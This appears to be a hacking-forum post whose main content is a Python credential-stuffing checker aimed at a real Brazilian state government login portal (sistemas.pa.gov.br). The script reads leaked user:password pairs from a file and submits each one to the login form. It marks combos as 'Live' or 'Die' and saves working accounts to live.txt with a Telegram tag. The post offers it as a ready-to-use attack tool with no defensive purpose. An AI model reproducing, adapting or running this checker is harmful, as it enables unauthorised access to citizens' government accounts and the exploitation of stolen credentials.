N.E.E.T
Social Engineering Counter-Expert
Divine
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 2
900 XP
Code:
import requests
from bs4 import BeautifulSoup
import os
from colorama import Fore, Style, init
init(autoreset=True)
def chk(user, senha):
try:
url = 'https://www.sistemas.pa.gov.br/governodigital/public/main/index.xhtml'
session = requests.Session()
response = session.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
viewstate = soup.find('input', {'name': 'javax.faces.ViewState'}).get('value')
data = {
'form_login': 'form_login',
'form_login:login_username': user,
'form_login:login_password': senha,
'javax.faces.ViewState': viewstate,
'form_login:button_login': 'form_login:button_login',
'nocid': 'true'
}
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br, zstd',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'https://www.sistemas.pa.gov.br',
'Referer': 'https://www.sistemas.pa.gov.br/governodigital/public/main/index.xhtml',
}
response = session.post(url, data=data, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
script_content = soup.select_one('#messages_s')
message = ''
if script_content:
message = script_content.text.strip()
if 'Dados incorretos.' in message:
print(f"{Fore.RED}{user}:{senha} - Die")
else:
print(f"{Fore.GREEN}{user}:{senha} - Live")
with open('live.txt', 'a') as live_file:
live_file.write(f"{user}:{senha} - t.me/reconhecido\n")
except Exception as error:
print(f"{Fore.RED}Erro na verificação: {error}")
def db():
if not os.path.exists('db.txt'):
print("O arquivo 'db.txt' não foi encontrado.")
return
with open('db.txt', 'r', encoding='utf-8') as db_file:
accounts = db_file.read().splitlines()
for account in accounts:
if account.strip():
parts = account.split(':')
if len(parts) >= 2:
user = parts[0]
senha = ':'.join(parts[1:])
chk(user, senha)
def main():
db()
if __name__ == '__main__':
main()